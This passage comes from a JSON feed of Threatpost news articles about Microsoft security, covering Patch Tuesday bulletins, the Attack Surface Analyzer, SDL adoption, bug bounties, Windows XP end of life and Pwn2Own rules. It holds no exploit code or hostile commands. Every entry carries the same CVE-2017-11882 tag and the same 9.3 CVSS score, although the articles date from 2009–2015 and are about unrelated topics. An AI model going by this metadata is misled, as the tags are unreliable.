of Windows \nServer 2003, Windows Server2008, and Windows Server 2008 R2. The vulnerabilities could allow remote code \nexecution if a user views a specially crafted Web page that instantiates \na specific ActiveX control with Internet Explorer. It also includes kill bits for four third-party ActiveX controls.\n * [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) \u2014 Fixes five privately reported vulnerabilities and one publicly \ndisclosed vulnerability in Internet Explorer. The most severe \nvulnerabilities could allow remote code execution if a user views a \nspecially crafted Web page using Internet Explorer. Users whose accounts \nare configured to have fewer user rights on the system could be less \nimpacted than users who operate with administrative user rights.This \nsecurity update is rated Critical for Internet Explorer 6 Service Pack 1 \non Microsoft Windows 2000 Service Pack 4; Critical for Internet \nExplorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows \nclients; and Moderate for Internet Explorer 6, Internet Explorer 7, and \nInternet Explorer 8 on Windows servers.\n\nQualys CTO Wolfgang Kandek noticed that four of the 10 bulletins address zero-day issues, the most significant being MS10-035, which fixes the zero-day published by Core Security for an information disclosure vulnerability originally published in February 2010. It also fixes the PWN2OWN vulnerability that security researcher Peter Vreugdenhil used to win ZDI\u2019S competition at CANSECWEST. During that contest, Vreugdenhil bypassed all built-in protections such as DEP and ASLR by combining multiple attack methods. \n \nThe MS10-040 bulletin is also interesting. It covers a a remotely exploitable vulnerability in all versions of IIS, but it is present only if the administrator has downloaded and installed the Channel Binding Update and enabled Windows Authentication. It further requires an account on the system, reducing the number of vulnerable hosts to a small subset. Microsoft rates this an \u201cimportant\u201d update.\n", "cvss3": {}, "published": "2010-06-08T19:07:32", "type": "threatpost", "title": "Patch Tuesday: Microsoft Kills Pwn2Own Browser Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:36:58", "id": "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "href": "https://threatpost.com/patch-tuesday-microsoft-kills-pwn2own-browser-bug-060810/74077/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:28", "description": "[](<https://threatpost.com/microsoft-releases-attack-surface-analyzer-tool-080612/>)Microsoft has released a public version of its internal Attack Surface Analyzer tool, which helps organizations identify changes to a system\u2019s attack surface as new applications are added. The tool has been in beta for a few months, but this is the first official release.\n\nThe Attack Surface Analyzer is part of the company\u2019s own internal software and application security efforts. It\u2019s part of Microsoft\u2019s Security Development Lifecycle, and it\u2019s meant to address the gaps in security that can arise when an organization installs new applications on a system. Even small changes on a system can lead to unanticipated consequences, including new vulnerabilities and weak spots where attackers might be able to slide in.\n\n\u201cUnlike many tools that analyze a system based on signatures or known vulnerabilities, Attack Surface Analyzer looks for classes of security weaknesses Microsoft has seen when applications are installed on the Windows operating system, and it highlights these as issues. The tool also gives an overview of changes to the system that Microsoft considers important to the security of the platform, and it highlights these changes in the attack surface report. Some of the checks performed by the tool include analysis of changed or newly added files, registry keys, services, Microsoft ActiveX controls, listening ports and other parameters that affect a computer\u2019s attack surface,\u201dMonty LaRue and Jimmie Lee of Microsoft said.\n\nAttack Surface Analyzer isn\u2019t just meant for security professionals or even IT staffs. Microsoft says the tool also can be of use to developers who can see how the code that they\u2019re writing will affect the security of a system. That\u2019s not often something that\u2019s possible for developers during the process of writing an application.\n\nThe new version of Attack Surface Analyzer includes both a GUI and a command line interface.\n\n\u201cThe tool has a stand-alone wizard to help guide users through the scanning and analysis process; a command-line version supports automation and older versions of Windows, and assists IT professionals as they integrate the tool with existing enterprise management tools,\u201d LaRue and Lee said.\n", "cvss3": {}, "published": "2012-08-06T18:09:02", "type": "threatpost", "title": "Microsoft Releases Attack Surface Analyzer Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:45", "id": "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "href": "https://threatpost.com/microsoft-releases-attack-surface-analyzer-tool-080612/76884/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:45", "description": "Microsoft made patch news on two fronts last month with an unusual [emergency patch for a critical vulnerability in Kerberos](<http://threatpost.com/microsoft-to-release-critical-out-of-band-windows-patch/109433>), and for a missing fix for an Exchange bug that was promised in its November advanced notification.\n\nIn the [December advance notification](<https://technet.microsoft.com/library/security/ms14-dec>), released today, an elevation privilege bug in Exchange is listed among seven scheduled bulletins to be pushed out next Tuesday. The Exchange patch is rated important, one of four bulletins so rated by Microsoft; the remaining three are rated critical, meaning the likelihood of remote code execution and imminent exploit is high.\n\nExpect the Exchange patch to be MS14-075. The patch applies to Microsoft Exchange Server 2007 SP3, Exchange Server 2010 SP3, Exchange Server 2013 SP1 and Exchange Server 2013 Cumulative Update 6. No further details were made available by Microsoft.\n\nThe three critical bulletins expected next week are topped off by another Internet Explorer rollup. The IE vulnerabilities addressed are rated moderate for IE 6, IE 7 and IE 8 running on Windows Server 2003 and Windows Server 2008. They are rated critical for remote code execution on Vista, Windows 7, Windows 8 and 8.1 for IE 7 and up.\n\nAnother critical remote code execution bulletin is expected in Office software starting with Microsoft Word 2007 SP 3, as well as Microsoft Office 2010 SP 2, Word 2010 SP 2, Word 2013 and Word 2013 RT. Microsoft Office for Mac 2011 is also vulnerable, as is Microsoft Word Viewer and Microsoft Office Compatibility Pack. Microsoft SharePoint Server 2010, 2013, and Microsoft Office Web apps 2010 and 2013 are also covered by this bulletin, but those vulnerabilities are rated important.\n\nTwo other bulletins patch remote code execution vulnerabilities in Office, but are rated important, meaning there is some mitigating circumstance, for example, an attacker would need local access or legitimate credentials exploit the flaw.\n\n\u201cWith the balance of next week\u2019s bulletins impacting Windows, December will be a month for IT to focus on the desktop,\u201d said Russ Ernst of Lumension.\n\nThe final critical bulletin covers remote code execution vulnerabilities in Windows Vista. The flaw is rated important for all other Windows Server versions. Windows Server 2003 users, meanwhile, are on notice that support runs out for the platform July 14, 2015.\n\nAs the year winds down, the number of critical bulletins is down. Microsoft is on track for 29 critical bulletins this year, compared to 42 last year, and 35 the year before. IT shops will have 83 bulletins to contend with this year, down from 105 in 2013, Lumension said.\n", "cvss3": {}, "published": "2014-12-04T14:04:03", "type": "threatpost", "title": "December 2014 Microsoft Patch Tuesday Advance Notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-12-09T21:46:18", "id": "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883", "href": "https://threatpost.com/missing-exchange-patch-expected-among-december-patch-tuesday-bulletins/109722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:39", "description": "[](<https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/>)Microsoft is trying to boost adoption of the software security practices in its Security Development Lifecycle by releasing a revised set of instructions to make implementation of the process easier and faster. \n\nAt the Black Hat DC conference on Tuesday, the company announced the release of its [\u201cSimplified Implementation of the Microsoft SDL\u201d](<http://www.microsoft.com/downloads/details.aspx?FamilyID=0baff8e8-ab17-4e82-a1ff-7bf8d709d9fb&displaylang=en>) paper, as well as a template designed to help developers integrate Microsoft\u2019s SDL, along with the Agile Software Development process, into Visual Studio. That template will enable developers to automatically check all of their code developed in Visual Studio against the SDL framework. \n\nMicrosoft has been pushing the need for more secure software development practices for several years, but some organizations have said that the company\u2019s SDL model is too difficult and expensive to implement, and doesn\u2019t fit into their organization\u2019s development structure. So the company is releasing the simplified description of the SDL implementation process in an effort to get more developers on board.\n\n\u201cThe process outlined in this paper sets a minimum threshold for SDL compliance. That said, organizations aren\u2019t uniform \u2013 development teams should apply the SDL in a way that is suitable to the human talent and resources available, but doesn\u2019t compromise organizational security goals,\u201d the company said in the SDL paper.\n\nThe paper defines various roles for people involved in the SDL process, and lays out required and optional SDL activities, as well as a five-phase process from requirements through release.\n", "cvss3": {}, "published": "2010-02-02T15:39:41", "type": "threatpost", "title": "Microsoft Tries to Boost SDL Adoption", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:34:21", "id": "THREATPOST:7E30033E60118E5B4B8C14689A890155", "href": "https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/73469/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:21", "description": "CANCUN \u2013 Bounty programs are mislabeled creatures, too often pigeonholed as a payoff for finding individual vulnerabilities in software.\n\nWrong.\n\n\u201cThe name bug bounty is actually a false categorization of what is truly just an incentive program,\u201d said Katie Moussouris, chief policy officer at HackerOne and architect of Microsoft\u2019s vulnerability coordination program, during her talk today at the Security Analyst Summit. \u201cYou are creating an incentive for whatever you want. It\u2019s not just individual bugs all the time.\u201d\n\nThat means organizations interested in nurturing their own programs should think about not only finding and fixing one-off bugs, but also focus on strategic goals such as eliminating entire classes of vulnerabilities and encouraging contributors to build mitigations. Architected correctly, vulnerability incentive programs can also feed an enterprise software development lifecycle and reduce the number of bugs that leak into production.\n\nAnd don\u2019t live under the illusion that you\u2019ll never have to contract a pen-tester again.\n\n\u201cThere\u2019s a time and place to get specialists under contact to look at things you don\u2019t want to open to the world; that\u2019s where a pen test comes in,\u201d Moussouris said. \u201cYou cannot replace pen-tests whole-heartedly. It\u2019s playing whack-a-bug if you\u2019re not feeding your bug bounty program results into your SDL.\u201d\n\nFor its part, Microsoft was standoffish about dipping into the bug bounty waters. And for good reason. As Moussouris explains it, for so long, researchers who wanted to find Windows or Internet Explorer bugs were only after credit in a Patch Tuesday security bulletin. Often, those were career boosters, she said. Even third-party established programs such as the Zero Day Initiative were contributing bugs to Microsoft gratis.\n\nBut as vulnerability brokers and companies such as VUPEN and ReVuln emerged, the market began to exert its pressures on Microsoft. Moussouris had to turn part politician inside the walls of Redmond and convince the powers that be to provide incentives to researchers to not give into the six-figure seduction of the vulnerability market and renew relationships with white-hats.\n\nThe end result were a number of specialized bounties sponsored by Microsoft, including a $100,000 mitigation bypass bounty, the Blue Hat bonus for defense and a temporary Internet Explorer bounty.\n\nIn each case, there were carrots Microsoft was dangling in front of researchers that others in the market were not.\n\n\u201cAgain, this isn\u2019t a bounty, it\u2019s an incentive,\u201d Moussouris said.\n\nYet it still wasn\u2019t good enough, Moussouris said, remembering how she had to convince Microsoft to begin paying for bug submissions in IE 10 while that version of the browser was in beta. She treasures a chart that shows a huge spike in bug submissions once IE 10 was released to manufacturing, many of those critical vulnerabilities that would be fixed in security bulletins.\n\n\u201cThere were no incentives if Microsoft fixed a bug during beta; no bulletin, no credit, no incentives during that period,\u201d Moussouris said. \u201cWhat if we create an incentive beta program if there were no buyers in town?\u201d\n\nThe bounty program was extended into beta, giving only Microsoft first crack at bugs before they were out in the open market. And they were fixed on the cheap too. For the IE 10 in beta, there were 23 submissions, 18 of those would have been rated critical, including four sandbox escapes, Moussouris said. The payout: $28,000, an average payout of $1,100.\n\n\u201cIf you create an incentive at the right time, you will absolutely get the results you want,\u201d Moussouris said.\n", "cvss3": {}, "published": "2015-02-16T13:59:58", "type": "threatpost", "title": "Lessons Learned in Building a Vulnerability Coordination Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-16T20:06:46", "id": "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "href": "https://threatpost.com/dont-build-a-bounty-program-build-an-incentive-program/111103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:21", "description": "The U.S. Navy recently hired an outside contractor, Obscure Technologies, to develop computer forensics tools capable of analyzing network traffic and stored data on gaming consoles.\n\nThe contract, valued at $177,237.50, calls on Obscure Technologies to create hardware and software tools that can be used to extract data from video game systems, compile a collection of data (disk images; flash memory dumps; configuration settings) extracted from new and used video game systems, and prepare a 10-20 page report including the following:\n\nDetailed accounts of issues involved in extracting forensic data from a series of game consoles, technical information regarding how information can be extracted from video game systems, any engineering decisions that were made and why, what work remains to be done, and any failings of the approaches followed.\n\n\u201cThis project involves furnishing video game systems, both new and used, and creating prototype rigs for capturing data from the video game systems,\u201d reads the Navy\u2019s official listing.\n\nThe project seeks to create these tools for use by the United States Department of Homeland Security Science and Technology.\n\nObscure Technologies was awarded this contract, the Navy claims, because they appear to be the only U.S. company in the business of purchasing used computer equipment for the purpose of accessing the data stored within. The Navy\u2019s justification and approval report also notes that Obscure Technologies lead scientist has experience reverse engineering the Microsoft XBOX.\n\nYou can find the Navy\u2019s justification and approval document [here](<https://www.fbo.gov/index?s=opportunity&mode=form&id=fa7296a2e0980fe24aa72c919a665b44>).\n", "cvss3": {}, "published": "2012-04-09T18:33:01", "type": "threatpost", "title": "Navy Hires Contractor to Data-Mine Gaming Consoles", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:05:32", "id": "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "href": "https://threatpost.com/navy-hires-contractor-data-mine-gaming-consoles-040912/76420/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:46", "description": "[ \n \n](<http://go.microsoft.com/fwlink/?LinkID=124807>)\n\nJonathan Ness of Microsoft\u2019s Security Research and Defense team explains the inner workings of the Data Execution Prevention technology that can help mitigate the [targeted attacks exploiting the vulnerability in Internet Explorer](<https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/>) right now.\n", "cvss3": {}, "published": "2010-01-19T14:32:51", "type": "threatpost", "title": "How DEP Can Mitigate IE Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:06", "id": "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "href": "https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/73391/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:13", "description": "Microsoft today announced a relatively light load of patches will be delivered on [Patch Tuesday](<https://technet.microsoft.com/library/security/ms14-sep>) next week, along with some numbers that demonstrate public vulnerability disclosures continue to rise.\n\nFour security bulletins, one rated critical, are scheduled to be released next Tuesday. In what\u2019s becoming customary for Patch Tuesday, administrators can expect another cumulative patch roll-up for Internet Explorer addressing a number of remote code execution vulnerabilities in the browser.\n\nThe three remaining bulletins, all rated important by Microsoft, include a privilege-escalation bug in Windows 8 and 8.1 as well as Windows Server 2012 and RT. Another bulletin patches a .NET denial-of-service vulnerability in Windows Server 2003, 2008 and 2012, and on the client side OS back to Vista.\n\nAnother denial-of-service bug is expected to be patched in Microsoft\u2019s Lync instant messaging and collaboration software.\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month.\u201d\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month however,\u201d cautions Russ Ernst, director, product management, Lumension.\n\nLast month, Microsoft patched IE with a [cumulative update that addressed 26 vulnerabilities](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) including one exploited in the wild. The news out of last month\u2019s batch of bulletins, however, was a faulty patch, MS14-045, that was [re-released after users complained of crashes and blue screens of death](<http://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>). The bulletin addressed vulnerabilities in kernel-mode drivers, and Microsoft blamed font issues for the system crashes.\n\nIn the meantime, Microsoft points out in a separate announcement that public vulnerability disclosures are approaching levels matching the first half of 2012, and that more than 4,000 disclosures have been made annually since the start of 2011. That number is still well shy of the 7,000 disclosed in the 2006-2007 timeframe, Microsoft said.\n\nFor the last half of 2013, for example, disclosures across the industry were up 6.5 percent from the start of the year, and up 12.6 percent from the second half of 2012. The severity of disclosures, however, is down. A little more than six percent of bugs scored 9.9 or greater on the CVSS standard in the second half of 2013, down from almost 13 percent in the first six months of the year.\n\n\u201cVulnerability complexity is an important factor to consider in determining the magnitude of the threat that a vulnerability poses,\u201d wrote Microsoft\u2019s Tim Rains in the [report](<http://blogs.technet.com/b/security/archive/2014/09/03/industry-vulnerability-disclosures-trending-up.aspx>). \u201cA high-severity vulnerability that can only be exploited under very specific and rare circumstances might require less immediate attention than a lower-severity vulnerability that can be exploited more easily.\u201d\n\nDisclosures of medium- and low-complexity bugs, posing the highest risk to users, far outnumber disclosures of high complexity vulnerabilities, Microsoft said.\n\nThird-party applications such as media players or Web components such as Flash or Java continue to thrive, with disclosures up 34.4 percent in the latter half of 2013 and accounted for 58 percent of disclosures during that timeframe. Operating system vulnerability disclosures, meanwhile, were down 46 percent and accounted for 15 percent of total disclosures. Browser bugs, meanwhile, were also down 28 percent and made up 10 percent of overall disclosures.\n\nMicrosoft also examined disclosures for its products, 174 in the second half of 2013, up 2 percent from the first six months. Microsoft disclosures account for 7 percent of industry disclosures, down slightly from the start of the year.\n", "cvss3": {}, "published": "2014-09-04T15:07:28", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday advance notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T19:07:28", "id": "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "href": "https://threatpost.com/patch-tuesday-includes-another-ie-update-vuln-disclosures-up/108098/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Dennis Fisher and Mike Mimoso discuss the Microsoft malware takedown, its legal and security implications and the revelation of a massive financial fraud campaign in Brazil.\n\nDownload: [digital_underground_157.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_157.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-07-04T09:00:55", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso Discuss This Week's Microsoft Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:52", "id": "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "href": "https://threatpost.com/threatpost-news-wrap-july-4-2014/107003/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:25", "description": "Microsoft says a recent patch for Outlook 2007 after it caused slow performance and problems with third party e-mail services. Microsoft withdrew a software update [released last week](<https://threatpost.com/microsoft-closes-door-stuxnet-december-patch-121410/>) after reports that the update, to its Outlook 2007 e-mail product, was causing problems for customers connecting to third party e-mail products. \n\nThe company has withdrawn the update [KB2412171](<http://support.microsoft.com/kb/2412171>) from its Microsoft Update service, [according to a blog post](<http://blogs.msdn.com/b/outlook/archive/2010/12/17/issues-with-the-recent-update-for-outlook-2007.aspx>). Microsoft recommends that customers who have installed it and encountered problems uninstall the patch.\n\nUsers began reporting problems with the Outlook 2007 update soon after it was released on December 14. Among other things, customers reported severe slowdowns in the Outlook 2007 application when moving between mail folders or clicking on Calendar or Task links. \n\nCustomers who used Outlook to send and receive messages from e-mail servers that were not running Microsoft\u2019s Exchange e-mail server software, including Gmail and Windows Live Hotmail. In addition, the update prevented Gmail users from connecting to Gmail\u2019s mail servers if the Outlook Secure Password Authentication (SPA) option was enabled, and broke Auto Archiving for IMAP, POP3 and Oulook Live Connector Accounts that were managed using Outlook, if no Exchange Server account was configured in the same Outlook profile, Microsoft said. \n\nMicrosoft apologized for the disruption and has provided instructions for removing the update while the company investigates the performance issues. \n", "cvss3": {}, "published": "2010-12-21T17:21:16", "type": "threatpost", "title": "Microsoft Withdraws Outlook Update After Gmail Conflicts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:28", "id": "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "href": "https://threatpost.com/microsoft-withdraws-outlook-update-after-gmail-conflicts-122110/74796/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:49", "description": "[From Washington Post (Brian Krebs)](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>)\n\n[](<https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/>)Microsoft may soon be taking the unusual step of issuing an out-of-band security update to address multiple weaknesses that stem from a Windows security flaw that the software giant tried to fix earlier this month. [Read the full story](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>) [washingtonpost.com] See more details [at Halvar Flake\u2019s blog](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>) [blogspot.com]\n", "cvss3": {}, "published": "2009-07-24T14:02:10", "type": "threatpost", "title": "Microsoft Scrambling to Close Stubborn Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:56", "id": "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "href": "https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/72881/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Windows XP security support ends Tuesday and until now, most of the public hand-wringing over XP\u2019s end-of-life has been about the potential for malware outbreaks against unpatched vulnerabilities that have been [stockpiled by hackers](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) anxiously awaiting April 8, 2014.\n\nBut what about vulnerabilities in XP that have been responsibly shared with Microsoft and won\u2019t be fixed? Those too are perpetual zero-days after Tuesday.\n\nMicrosoft has made huge strides in developing trusted relationships with security researchers who are actively submitting bugs to Microsoft across its product lines. For Microsoft\u2019s part, it has done outreach to researchers, clarified disclosure policies and processes and established [bounty programs for bypasses of innate Windows mitigations](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>).\n\nAnd Microsoft isn\u2019t to be faulted for its business decision made long ago to end extended support for XP that includes security patches. Yet the fact remains whatever XP systems remain in circulation after tomorrow will be exposed and that brings up questions, such as: How will white or gray hats respond? For example, will there be a firestorm of public disclosures in the coming weeks?\n\n\u201cI know a subset of people who have disclosed stuff [in XP] to Microsoft that has not been patched, and that\u2019s given what I know. I\u2019m sure there\u2019s more I don\u2019t know of,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cI wouldn\u2019t encourage researchers to publically disclose their researche because they think that might make Microsoft issue a patch, because that\u2019s not going to happen. The only result is that it would increase the exposure for people at large.\n\n\u201cIt\u2019s a muddy bit of water,\u201d Barrett said. \u201cMicrosoft has been good about dealing with researchers who have been doing the right thing by following responsible disclosure procedures, but now they\u2019re not seeing action.\u201d\n\nMicrosoft did not respond to a request for comment in time for publication.\n\nHP\u2019s Zero Day Initiative, which buys vulnerabilities and exploits from researchers and shares them first with customers and then the affected vendor, has [203 advisories pending public disclosure](<http://www.zerodayinitiative.com/advisories/upcoming/>) listed on its website, 54 of which are Microsoft vulnerabilities going back a year. The website doesn\u2019t list the specific Microsoft product affected, but Microsoft has more than any other major vendor on the list.\n\n\u201cI\u2019m sure there\u2019s tons of stuff still out there; some of it is design flaw stuff that Microsoft can\u2019t fix or never got around to it,\u201d Barrett said. \u201cI\u2019m sure there\u2019s a backlog of stuff, but the clock has run out on XP.\u201d\n\nMicrosoft has already announced its final XP patch, a fix for a zero-day in Word that will be available Tuesday (Office 2003 support also ends Tuesday). The fear among some experts is that hackers will look at Microsoft security bulletins for vulnerabilities in supported products and trace those back to their potential exploitability in XP.\n\n\u201cAbsolutely hackers do that,\u201d Barrett said. \u201cIf you\u2019ve got a vulnerability in this file, they\u2019ll track it back to a particular DLL and see that it\u2019s been part of the OS since 2002 and not updated since 2004, they\u2019ll know it\u2019s vulnerable.\n\n\u201cYou might see a golden age of XP vulnerabilities for the next four to six months when adoption of XP is still relatively high and countermeasures are no longer in place. Then you\u2019ll start to see it fade as it\u2019s less used.\u201d\n\nQualys CTO Wolfgang Kandek has been tracking XP use in certain industries through the company\u2019s vulnerability scanner. Financial institutions still have the highest use of XP at 21 percent, followed by transportation at 14 percent (though this has dropped from 55 percent 12 months ago). Retail, another industry run ragged by hackers, is also at 14 percent. Support for Windows XP Embedded, which runs inside a number of consumer and commercial devices in these industries, does not run out until Jan. 12, 2016.\n\n\u201cThis is an additional weakness for these (retail) systems,\u201d Kandek said. \u201cThere are already problems with remote management, default passwords that work everywhere, a bunch of things that were done to make management easier that were not configured well. This just adds to it.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n", "cvss3": {}, "published": "2014-04-08T06:03:54", "type": "threatpost", "title": "Unpatched Bugs, Windows XP End of Life and Public Disclosure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-08T00:08:09", "id": "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "href": "https://threatpost.com/the-muddy-waters-of-xp-end-of-life-and-public-disclosures/105295/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:08", "description": "Microsoft will release seven bulletins in the [October Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-oct>) next week, fixing 20 total vulnerabilities in Windows, Office, Lync and SQL Server. Only one of the bulletins is rated critical, while the six others are rated important.\n\nThe one critical bulletin affects Microsoft Office 2003, 2007 and 2010 and Microsoft officials said that the bug it will fix can be used for remote code execution. The remaining six bulletins, which all are rated important, also can be used for remote code execution. \n\nThe other software affected by the October bulletins includes SharePoint, Groove Server, SQL Server 2000, 2005, 2008 and 2012. \n\nThe one critical bulletin will fix a flaw in Microsoft Word, company officials said.\n\n\u201cToday we\u2019re providing [advance notification](<http://technet.microsoft.com/security/bulletin/ms12-oct>) of the release of seven bulletins, one Critical and six Important, which address 20 vulnerabilities for October 2012. The Critical bulletin addresses vulnerabilities in Microsoft Word. The six Important-rated bulletins will address issues in Windows, Microsoft Office, and SQL Server. This release will also address the issue in FAST Search Server first described in [Security Advisory 2737111](<http://technet.microsoft.com/security/advisory/2737111>),\u201d Dustin Childs of Microsoft said.\n\nThat bug in FAST Search Server first came to light in July and also existed in Microsoft Exchange Server. \n\n\u201cThe vulnerabilities exist due to the way that files are parsed by the third-party, Oracle Outside In libraries. In the most severe case of Microsoft Exchange Server 2007 and Microsoft Exchange Server 2010, it is possible under certain conditions for the vulnerabilities to allow an attacker to take control of the server process that is parsing a specially crafted file. An attacker could then install programs; view, change, or delete data; or take any other action that the server process has access to do,\u201d Microsoft said in its security advisory at the time.\n", "cvss3": {}, "published": "2012-10-04T18:28:36", "type": "threatpost", "title": "Microsoft to Fix Critical Word Flaw in October Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:25", "id": "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "href": "https://threatpost.com/microsoft-fix-critical-word-flaw-october-patch-tuesday-100412/77083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:54", "description": "The [Pwn2Own contest at the CanSecWest](<https://threatpost.com/why-pwn2own-whats-right-security-030911/>) conference has become one of the landmark events on the calendar each year, as researchers gather with nervous vendors in a tiny room to see who can own which browser on which platform and how quickly. But this year\u2019s contest will have a much different look than past editions, with participants vying for more than $100,000 in cash by amassing points over the course of three days.\n\nThe new format will include the assignment of point values for each of the various targets in the contest, which typically are browsers such as Internet Explorer, Firefox and Chrome running on Mac OS X or Windows machines. In order to win the contest, a participant must have at least one zero-day vulnerability in one of the targets. Each successful compromise of a target with a zero-day will be worth 32 points, and unlike in past years, targets will not be removed from the competition once they\u2019ve been successfully compromised by one researcher.\n\nAlso, on the first day of the contest, the organizers from HP\u2019s TippingPoint Zero Day Initiative will announce two previously patched vulnerabilities that contestants can use on each target. They will then have three days to write an exploit that works on a given target, although the point awarded for a win will decrease each day. A win on the first day earns 10 points, nine points on the second day and eight on the third. For those \u201cpublic vulnerabilities\u201d, there won\u2019t be any requirement for a sandbox escape or bypass of protected mode in the browsers.\n\nThe changes are the result of a review of past years\u2019 contests and a desire to make the event fairer for everyone involved. In past years, there was a drawing to see which participant would go first on each target, and once it was successfully compromised, it was off the table for everyone else. There also will be first, second and third places this year, with cash rewards of $60,000, $30,000 and $15,000, respectively. The three researchers with the highest point totals at the end of the three-day contest will win the money.\n\n\u201cWe basically rearchitected the entire thing this year. We wanted to take our limited budget and spread it over three winners in order to give them 